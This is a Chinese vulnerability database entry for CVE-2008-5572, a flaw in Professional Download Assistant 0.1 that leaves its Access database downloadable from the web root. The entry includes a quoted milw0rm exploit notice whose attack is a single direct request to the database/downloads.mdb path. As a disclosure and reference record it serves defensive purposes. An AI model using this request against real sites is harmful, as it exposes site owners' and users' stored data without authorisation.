Professional Download Assistant database/downloads.mdb敏感信息泄漏漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116964 漏洞类型 权限许可和访问控制
发布时间 2008-12-07 更新时间 2008-12-15
CVE编号 CVE-2008-5572 CNNVD-ID CNNVD-200812-257
漏洞平台 ASP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7371
https://www.securityfocus.com/bid/84665
https://cxsecurity.com/issue/WLB-2008120142
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-257
|漏洞详情
ProfessionalDownloadAssistant是一款免费的,采用P2P技术的下载工具,也是一个全功能的下载加速以及管理工具。ProfessionalDownloadAssistant0.1版本在WEB根目录下储存敏感信息,却没有给予足够的访问控制,这会允许远程攻击者可以借助对database/downloads.mdb提交一个直接请求,下载数据库文件。
|漏洞EXP
####################################################################################################
# Professional Download Assistant (downloads.mdb) Database Disclosure Vulnerability                #
# © Ghost Hacker - REAL-H.COM                                                                      #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] Homepage : http://Real-h.com                                                                  #
#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com                                                    #
#[~] Bug : Database Disclosure                                                                     #
#[~] Name Script : Professional Download Assistant                                                 #
#[~] Download : http://www.dotnetindex.com/downloads/easy_download_getinfo.asp?id=8                #
####################################################################################################
#[~]Exploit                                                                                        #
# http://xxxx.com/[path]/database/downloads.mdb                                                    #
##################################### ###############################################################
#[~]Greets :                                                                                       #
# Mr.SaFa7 [v4-team.com] , All Members Real-h.com and v4-team.net , All My Friends (3ed mobark)    #
####################################################################################################

# milw0rm.com [2008-12-07]
|受影响的产品
dotnetindex Professional Download Assistant 0.1
|参考资料

来源:XF
名称:pda-downloads-information-disclosure(47148)
链接:http://xforce.iss.net/xforce/xfdb/47148
来源:MILW0RM
名称:7371
链接:http://www.milw0rm.com/exploits/7371
来源:SREASON
名称:4748
链接:http://securityreason.com/securityalert/4748
来源:SECUNIA
名称:33030
链接:http://secunia.com/advisories/33030
来源:OSVDB
名称:50547
链接:http://osvdb.org/50547